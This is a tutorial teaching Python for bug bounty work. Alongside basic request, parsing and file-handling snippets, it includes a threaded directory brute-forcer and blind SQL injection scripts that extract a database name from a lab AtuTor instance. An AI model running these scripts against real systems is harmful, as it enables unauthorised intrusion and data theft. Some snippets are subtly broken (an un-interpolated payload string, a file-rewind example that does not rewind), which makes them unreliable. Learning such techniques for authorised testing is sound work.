Python for Bug Bounty Hunters & Web Hackers

Check out my original Github Repository here: Python for AWAE

Objective

Learn and understand Python well enough that we can use it to automate our bug bounty tasks or create quick exploits whenever required.

Where did I learn python?

Necessary Python Libraries

urllib2 (if python 2.x is in use)

Code to make a Simple GET Request using urllib2:

import urllib2
url = 'https://www.google.com/'
response = urllib2.urlopen(url) # GET 
print(response.read())
response.close()

urllib (if python 3.x is in use)

Code to make a Simple GET Request using urllib:

import urllib.parse 
import urllib.request

url = 'https://www.google.com/'
with urllib.request.urlopen(url) as response: # GET
    content = response.read()
print(content)

Code to make a Simple POST Request using urllib:

info = {'user':'blackhat', 'passwd':'1337'}
data = urllib.parse.urlencode(info).encode()    # data is now of type bytes
req = urllib.request.Request(url, data)
with urllib.request.urlopen(req) as response: 	# POST
    content = response.read()

print(content)

Requests

It's not a part of the standard library, hence the installation is required.
Installation:
pip install requests
Importing:
import requests
Methods:
r = requests.get(url) r = requests.post(url, data={'key':'value'}) r = requests.put(url, data={'key':'value'}) r = requests.delete(url) r = requests.head(url) r = requests.options(url)
Print Request URL:
print(r.url)
Passing params in URLs via GET:
payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get('https://httpbin.org/get', params=payload)
Passing a list of items:
payload = {'key1': 'value1', 'key2': ['value2', 'value3']} r = requests.get('https://httpbin.org/get', params=payload) print(r.url)
Get Response Content in binary form:
r.content
Get Response Content in json form:
r.json
Get raw response content:
r.raw.read(10)
Add custom header:
url = 'https://api.github.com/some/endpoint' headers = {'user-agent': 'my-app/0.0.1'} r = requests.get(url, headers=headers)
POST a multipart-encoded file:
url = 'https://httpbin.org/post' files = {'file': open('report.xls', 'rb')} r = requests.post(url, files=files) r.text
Sending our own cookies:
cookies = dict(cookies_are='working') r = requests.get(url, cookies=cookies) r.text
Others:
r.status_code # get status code r.headers # get response headers r.cookies # get cookies

`lxml` and `BeautifulSoup` packages

The lxml package provides a slightly faster parser, while the BeautifulSoup package has logic to automatically detect the target HTML page's encoding.
Installation:
pip install lxml pip install BeautifulSoup
Suppose we are having the HTML content from a request stored in a variable named content. Using lxml, we could retrive the content and parse the links as follows:
from io import BytesIO from lxml import etree import requests url = 'https://www.example.com' r = requests.get(url) content = r.content # content is of type 'bytes' parser = etree.HTMLParser() content = etree.parse(BytesIO(content), parser=parser) # Parse into > tree for link in content.findall('//a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")
```
Note: I tested this and I think it only works with python 3.6 or below
```
Same thing Using BeautifulSoup
from bs4 import BeautifulSoup as bs import requests url = "https://www.google.com" r = requests.get(url) tree = bs(r.text, 'html.parser') # Parse into tree for link in tree.find_all('a'): # find all "a" anchor elements print(f"{link.get('href')} -> {link.text}")

Python Multi-threading

I personally think that multi-processing is better as compared to multi-threaded python scripts. It's good to learn unless and until you wanna just sit and see each request going one by one wasting your time.

We usually use python `queue` for multi-threading coz it's thread-safe and doesn't cause race condition.

Here's a brute-forcing tool that'll help you understand multi-threading using queue.
import queue import threading import urllib.error import urllib.parse import urllib.request threads = 50 target_url = "http://testphp.vulnweb.com" wordlist_file = "all.txt" # from SVNDigger resume = None user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \ "Gecko/20100101 " \ "Firefox/19.0" def build_wordlist(wordlst_file): # read in the word list fd = open(wordlst_file, "r") raw_words = [line.rstrip('\n') for line in fd] fd.close() found_resume = False words = queue.Queue() for word in raw_words: if resume: if found_resume: words.put(word) else: if word == resume: found_resume = True print("Resuming wordlist from: %s" % resume) else: words.put(word) return words def dir_bruter(extensions=None): while not word_queue.empty(): attempt = word_queue.get() attempt_list = [] # check if there is a file extension if not # it's a directory path we're bruting if "." not in attempt: attempt_list.append("/%s/" % attempt) else: attempt_list.append("/%s" % attempt) # if we want to bruteforce extensions if extensions: for extension in extensions: attempt_list.append("/%s%s" % (attempt, extension)) # iterate over our list of attempts for brute in attempt_list: url = "%s%s" % (target_url, urllib.parse.quote(brute)) try: headers = {"User-Agent": user_agent} r = urllib.request.Request(url, headers=headers) response = urllib.request.urlopen(r) if len(response.read()): print("[%d] => %s" % (response.code, url)) except urllib.error.HTTPError as e: if e.code != 404: print("!!! %d => %s" % (e.code, url)) pass word_queue = build_wordlist(wordlist_file) file_extensions = [".php", ".bak", ".orig", ".inc"] for i in range(threads): t = threading.Thread(target=dir_bruter, args=(file_extensions,)) t.start()

Python Multi-Processing

Let's understand multi-processing using a script that'll help us retrieve database length using SQL

import multiprocessing as mp import requests target = "http://localhost/link/" def db_length(number): payload = f"te')/**/or/**/(length(database()))={number}#" param = {'q': payload} r = requests.get(target, param) content_length = int(r.headers['Content-length']) if content_length > 20: print(number) if __name__ == "__main__": print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ') processes = [] for number in range(30): p = mp.Process(target=db_length, args=[number]) p.start() processes.append(p) for process in processes: process.join()

Python `concurrent.futures`

This one is the GOAT. Less code, more capability.

import requests
import concurrent.futures

target = "http://localhost/atutor/"
final_string = {}

def db_length(number):
    payload = f"te')/**/or/**/(length(database()))={number}#"
    param = {'q': payload}
    r = requests.get(target, param)
    content_length = int(r.headers['Content-length'])
    if content_length > 20:
        return number

    
def atutor_dbRetrieval(l):
    for j in range(32, 256):
        payload = f"te')/**/or/**/(select/**/"
        payload += "ascii(substring(database(),{l},1))={j})#"
        param = {'q': payload}
        r = requests.get(target, param)
        content_length = int(r.headers['Content-length'])
        if content_length > 20:
            final_string[l-1] = chr(j)
            print(''.join(final_string[i] for i in sorted(final_string.keys())))
            


if __name__ == "__main__":
    print('[*] Retreiving Database Length: \n[*] Database length: ', end=' ')
    
    db_len = 0
    with concurrent.futures.ProcessPoolExecutor() as executor:
        results = [executor.submit(db_length, _) for _ in range(30)]
        
        for f in concurrent.futures.as_completed(results):
            if f.result() != None:
                db_len = f.result()
    print(db_len)
        
    print("[+] Retrieving Database name: ....")
    with concurrent.futures.ThreadPoolExecutor() as executor:
        results = [executor.submit(atutor_dbRetrieval, index) for index in range(db_len+1)]

    print("[+] Database Name: ", end=" ")
    print(''.join(final_string[i] for i in sorted(final_string.keys())))
    print("[+] Done")

Using python to navigate file system

OS Module

Note: Python OS Module can be used to navigate through the file system.

+ os.getcwd()                    
+ os.chdir()                     
+ os.listdir()	                
+ os.mkdir()                    
+ os.makedirs()           
+ os.rmdir()	             
+ os.removedirs()         
+ os.rename(, )          
+ os.stat()              
+ os.walk()	                 
+ os.environ		                   
+ os.path.join(, )    
+ os.path.basename()     
+ os.path.dirname()      
+ os.path.exists()   
+ os.path.splitext() 
+ dir(os)

=> get curret working directory
=> change directory
=> list directory
=> create a directory
=> make directories recursively
=> remove directory
=> remove directory recursively
=> rename file
=> print all info of a file
=> traverse directory recursively
=> get environment variables
=> join path without worrying about /
=> get basename
=> get dirname
=> check if the path exists or not
=> split path and file extension
=> check what methods exists

Using python to read and write files

Reading a file
with open('test.txt', 'r') as f: f_contents = f.read() print(f_contents)
Get all lines into a list
with open('test.txt', 'r') as f: f_contents = f.readlines() print(f_contents)
Read 1 line at a time
with open('test.txt', 'r') as f: f_contents = f.readline() print(f_contents)
Reading file efficiently
with open('test.txt', 'r') as f: for line in f: print(line, end='')
Going back to the start of the file
with open('test.txt', 'r') as f: for line in f: print(line, end='')
Writing to a file

with open('test2.txt', 'w') as f:
    f.write('Test')

Note: `w` will overwrite the file, so use `a` if you wanna append

Appending to a file
with open('test2.txt', 'a') as f: f.write('Test')
Read and write to a file at the same time
with open('test.txt', 'r') as rf: with open('test_copy.txt', 'w') as wf: for line in rf: wf.write(line)

Conclusion

As per my experience, with this much knowledge of python - you can write almost all automation scripts you'll ever require while doing bug bounties and web hacking.